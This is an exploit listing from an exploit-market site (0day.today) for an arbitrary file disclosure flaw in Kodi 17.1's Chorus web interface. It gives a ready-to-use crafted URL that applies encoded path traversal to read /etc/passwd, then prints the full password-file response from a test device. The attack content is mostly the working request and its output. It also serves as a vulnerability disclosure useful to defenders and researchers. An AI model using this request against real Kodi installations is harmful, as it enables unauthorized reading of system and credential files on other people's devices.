[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kodi 17.1 - Arbitrary File Disclosure Vulnerability

Author
Eric Flokstra
Risk
[
Security Risk High
]
0day-ID
0day-ID-26970
Category
web applications
Date add
12-02-2017
Platform
php
# Exploit Title: Kodi - Unrestricted file download
# Date: 12 February 2017
# Exploit Author: Eric Flokstra
# Vendor Homepage: https://kodi.tv/
# Software Link: https://kodi.tv/download/
# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
# Tested on: Linux
 
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation. Chorus is a web interface
for controlling and interacting with Kodi. It is hosted by the Kodi
installation.
 
The web interface loads a thumbnail of an image, video or plugin when
selecting a category in the left menu with the following request:
 
http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
 
Insufficient validation on user input is performed on this URL resulting
in an unrestricted file download vulnerability. This enables attackers
to retrieve arbitrary files from the filesystem by changing the location
after the '/image/image%3A%2F%2F’ part.
 
Example request:
 
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
 
Response:
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time
Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network
Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd
Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
avahi:x:105:108:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
ntp:x:106:110::/home/ntp:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
osmc:x:1000:1000::/home/osmc:/bin/bash

#  0day.today [2024-12-25]  #